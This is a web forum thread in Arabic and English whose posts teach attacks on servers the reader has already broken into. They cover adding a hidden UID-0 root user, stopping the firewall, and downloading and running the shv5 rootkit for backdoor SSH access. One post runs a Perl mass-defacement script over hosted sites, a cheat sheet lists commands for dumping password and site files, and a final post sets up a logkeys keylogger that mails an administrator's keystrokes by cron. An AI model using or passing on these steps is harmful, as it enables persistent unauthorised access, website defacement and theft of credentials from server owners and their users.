Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: تركيب الروت كيت


Senior Member

Status: Offline
Posts: 317
Date:
تركيب الروت كيت
Permalink Closed


السلام عليكم

 

اليوم حنتكلم عن الروت كيت للضمان للرجوع الى السيرفر

 

اولا:



In this tutorial you will be learning :

Create a new User with Root PrivilegeClosing Server's FirewallSave Root if Password Changed Or User got Deleted
Requirments :

- rooted server with ssh access
- Putty
- Tools (Provided at the end of Topic)


Chapter 1 : Connecting with Putty


All we have to do here is Just

1) Open Putty
2) Enter Server IP and Port
3) Connect
4) Type username and Pass


Now we will see something like this :

[Image: Capture1.png]

Now we should type :

Code:
/usr/sbin/useradd -o -u  0 hackforums
passwd hackforums
hf300!


Here We created a user called 'hackforums' with password 'hf300!'
now lets Logout and Login as 'hackforums'

[Image: Capture2.png]

now lets type :

Code:
whoami


when you see 'root' then we have successfully added new root user

Chapter 2 (Saving our Root)


Now after we Login to ssh
We have to close the firewall of the Server, Just by typing :

Code:
/etc/init.d/ipaliases stop


Now we have to Upload the 'shv5.zip'

Now what does this zip do ?
It Simply Add new ssh Connection with new root and new Connection Port

P.S. there are 3 ways to Save Root I will only be teaching only one in this Tutorial

Okey now we have to upload shv5.zip by using this Command :

Code:
wget http://site.com/shv5.zip


[Image: Capture3.png]

this will download file to Server .. Now after we download it we will unzip it by using this command :

Code:
unzip shv5.zip


Now after we unzip it we have to Enter the shv5 dir by typing :

Code:
cd shv5


and changing chmod to setup file to 4577 :

Code:
chmod 4755 setup


./setup hackforums 754

Run Command
- Filename - Username for new connection - ssh Port

And Now we Are done just relax your back till it finish. Now after it finished you may get an Error .. just ignore it and close putty and Open it again with new Port number and Username and Enjoy ^.^

Shout Outs :

- ๖ۣۜΗ α x O r ♥
- -DownFall
- BeggfoMercy
- Joomlafkr

Tools :

- shv5.zip Click Here




__________________


Senior Member

Status: Offline
Posts: 317
Date:
Permalink Closed

الشرح الخاص بي


السلام عليكم

درس هو تركيب الروت كيت علي السيرفر

روت كيت
shv5.zip

راح نرفعو علي السيرفر

نفك الضغط
unzip shv5.zip
راح نعطيه تصريح
777
ونشغلو مع
setup./

مع اضافة البورت والباس

يعني
./

setup

pass7777 port 5555
تم تبيت الروت كيت

دخول
usr root pass 7777 port 5555

راح نجرب دخول
putty
دخلنا



السكربت الخاص بالماس

http://super-arab.com/mass.zip


شف يآ بعدي ركز معي خطوه خطوه |

آول شئ

آنآ رآفع لك سكربت المآس + سكربت التسجيل بالزون آتش |

المهمـ

آول شئ تدخل ع مجلد الـ home

بحسآب الروت طبعآ ..

تسحب الملفآت ( آندكسك + سكربت المآس )

بالأمرر مثآل

لسحب سكربت المآس

wget http:/www.xxx.com/mass.zip

مثآل لسحب الأندكس

wget http:/www.xxx.com/index.zip


طبعآ آنآ آفضلهم يكونون مضغووطين

لمآ تسحبهم تفك الضغط عنهم |

unzip mass.zip
unzip index.zip

بعد كله هذآ الحين تشغل سكربت المآس

بالأمرر

perl mass.pl /home/index.html


الـ perl : لتشغيل السكربت ..

وآنتظر لين ينتهي شغل السكربت |

بعدهآ تروح للـ bing وتحط آيبي السيرفر وتشوف الموآقع اللي دعستهآ ||

---------------

تعب وربي بالشرح .. آقل شئ دعوه بظهر الغيب |




__________________


Senior Member

Status: Offline
Posts: 317
Date:
Permalink Closed

اوامر الشل اوامر الليونكس اوامر اللينكس  اوامر الشيل اوامر ليونكس اوامر لينكس

 اوامر اللينكس اوامر الشيل

 

أوامر الضغط وفك الضغط 
مثال على الأمر للتوضيح الأمر كتابتاً وظيفة الأمر
qzip failname qzip zip  أمر الضغط بامتداد  
unzip failname unzip  zip امر فك الضغط بامتداد 
tar -zcf zz.tar daily tar -zcf tar  أمر الضغط بامتداد 
tar -zxf zz.tar tar -zxf tar أمر فك الضغط بامتداد
tar -czvf file name.tar.gz filename.sql tar -czvf  gz أمر ضغط الملف بامتدا
gzip -d file.gz gzip -d  gz فك الضغط بامتداد 
tar -czvf filename.tar.gzfile name.sql tar -czvf كيفية ضغط قاعدة البيانات
tar -zxvf file name.tar.gz tar -zxvf كيفية فك قواعد البيانات 
tar -czvf /home/user/public_html/n3.tar.gzn3tar -czvf

tar.gz  امر ضغط المجلدات بامتداد

 

أوامر الداخلية
مثال على الأمر للتوضيح الأمر كتابتاً وظيفة الأمر
ls ls استعراض الملفات
ls ls -la استعراض الملفات والمجلدات المخفية والتصاريح
pwd pwd تحديد المكان علىالسيرفر
ls;pwd ; اداة الربط بين الأوامر

wget http://xxxx.com/xxx.zip

wget أمرالسحب
curl -o ./xxx.zip http://xxxx.com/xxx.zip curl -o ./ امر السحب الآخر
history history أمر معرفة جميع الأوامر التي نفذت بالشل
mkdir shuooonmkdir انشاء مجلد جديد
rm failname rm أمر الحذف
rm -r dir rm -r حذف مجلد بجميع الملفات
edit failnameedit أمر التعديل
whowho امر التصلين على السيرفر
cdcd امر دخول المجلدات
cd ..cd .. امر العودة للخلف
mv mv امر اعادة التسمية
findfind امر البحث
./ ./ أمر تشغيل الباك دور
uname -auname -a أمر معرفة اصدار السيرفر
ls ftp.zip* * امر يرمز للكل
man lsman امر المساعدة
drwxrwxrwx chmod 777 dd chmod  أمر إعطاء التصريح
touch shuooon.php touch  أمر انشاء ملف فارغ
gcc xxx.c -o xxx

gcc

ترجمة الكومبايل او الاكسبلويت

usr/bin/perl  يبدأ الكود بهذه الكلة   لا يحتاج ترجمة

ملفات البيرل تبدأ بــ

include يبدأ الكود بهذه الكلة ترجمة وتشغيل فقط ملفات السي تبدأ بــ
أوامر  الخارجية
مثال على الأمر للتوضيح الأمر كتابتاً وظيفة الأمر
cat /home/*/public_html/_vti_pvt/access.cnf cat عرض جميع المواقع التي على السيرفر
cat /home/*/public_html/_vti_pvt/service.pwd cat عرض جميع الباسووردات على السيرفر
cat /usr/local/apache/conf/httpd.conf cat لمعرفة عرض مصدر السيرفر
find / -name httpd.conf find عرض المصدر
more /etc/userdomains more   CAT امر مشابة للأمر
pico /home/burst/public_html/index.html pico  تحرير النصوص
vi /home/burst/public_html/index.html vi امر تحرير به الكثير من المزايا لكنه اصعب من السابق
valiases  المهم نحدد ls -la /etc/valiases ls معرفة المواقع اللي على السيرفر مع اليوزر
ls /var/named ls معرفة جميع المواقع اللي على السيرفر
valiases  المهم نحدد ls /usr/local/psa/home/vhosts/ls معرفة جميع المواقع على السيرفر
perl xxxx.pl perl تشغيل البيرل
cat /etc/passwd ابحث عن bash cat امر استخراج حسابات الشل

 

 

 

 

 

اكتب الامر التالي لاضافه يوزر بصلاحيات الروت ومضاف الى مجموعه الروت :

/usr/sbin/useradd -o -u 0 -g 0 aljyyosh -p adminR00t

تفاصيل الامر

طبعا اليوزراللي هو روت: aljyyosh
والباسورد : adminR00t

-o : لاستخدام تغيرات مع الامر
-u : لاضافته الى مجموعه اليوزر ذات رقم 0 ( الي هي الروت )
-g : القروب او المجموعه ذات رقم 0 يعني مجموعه الروت ايضا .
----------------
ونجي بامر ثاني نفس الامر الاول .
ايضا تقدر عن طريق هذا الامر:

/usr/sbin/useradd -o -u 0 aljyyosh

بعدين تدخل لهذا المستخدم باسورد يعني تضيف باسوورد جديد للمستخدم واذا تبي تغير باسوورد يوزر كذا بعد بالطريقه التاليه:
passwd aljyyosh

بعدين بيطلع لك الرساله التاليه:
New UNIX password:
تكتب باسوورد جديد ولازم يكوون صعب ومعقد (:

بعدين تطلع لك رساله زي كذا يعني ادخلها مره ثانيه:
Retype new UNIX password:
يعني اعد ادخال كلمه المرور
اعد كتابتها ,, بيعطيك الرساله التاليه :
Changing password for user aljyyosh.
passwd: all authentication tokens updated successfully.
ومبرووك عليك صلاحيات مستخدم روت جديده (:
 

وفي الختام

لا تنسونا من صالح الدعاء



__________________


Senior Member

Status: Offline
Posts: 317
Date:
Permalink Closed


تحية لكم ياأعضاء وزوار منظمة الهكر العربى ، نسأل الله أن تكونوا على خير حال

عودة من جديد بمواضيع مميزة

موضوعنا اليوم يتناول تحميل ملف كيلوجر على السيرفر ووصول التبليغ على الإيميل لنتابع


في البداية نقوم بتنفيذ الأوامر التالية :

PHP Code:
get http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz
tar xvzf logkeys-0.1.1a.tar.gz
cd logkeys-0.1.1a/
./configure
make
make install
بكذا نكون ثبتنا الكيلوجر على السيرفر وانتهينا من جزء كبير من الشغل
الان بدنا نعمل انشاء لملف اللوج اللي راح يتم وضع كل ما يكتبه الروت فيه كالتالي :

PHP Code:
touch /home/the user that u have a cpanel on it/public_html/root.log
cd /home/the user that u have a cpanel on it/public_html/
chmod 777 root.log
خطوة تغيير التصاريح من اهم الخطوات في هذه المرحلة



rc.local تمام الان احنا بدنا الروت كيت يشتغل في كل مرة يصير ريستارت للسيرفر وما يوقف لازم نعدل على الملف

PHP Code:
pico /root/rc.local
بعدين قم باضافه الكود التالي

PHP Code:
logkeys --start ---us-keymap --output=/home/the user that u have a cpanel on it/public_html/root.log --device=event4
طبعا ضع هذا الكود قبل نهايه الملف اي قبل exit0


الان طبق الامر التالي ..

PHP Code:
logkeys --start --output /home/the user that u have a cpanel on it/public_html/root.log
لان كل شئ تم ... صار الكيلوجر شغال وكمان كل ما يعمل ريستارت الكيلوجر بيشتغل

الان بدنا نروح للمرحلة الاخيرة وهي عمليه انو يوصلك الباس للايميل وهذي سهله جدا فقط تروح للموقع اللي الك عليه سي بنل بعدين
cron job تدخل على
بعدين تضع الإيميل تبعك وتكتب الامر التالي

PHP Code:
cat /home/the user that u have a cpanel on it/public_html/root.log
ومبروك عليك كل ما يكتبه الروت والهكر الموجود على السيرفر بتسحب ثغرات وايضا بتسحب ايميلات وكل شئ



__________________
Page 1 of 1  sorted by
 
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard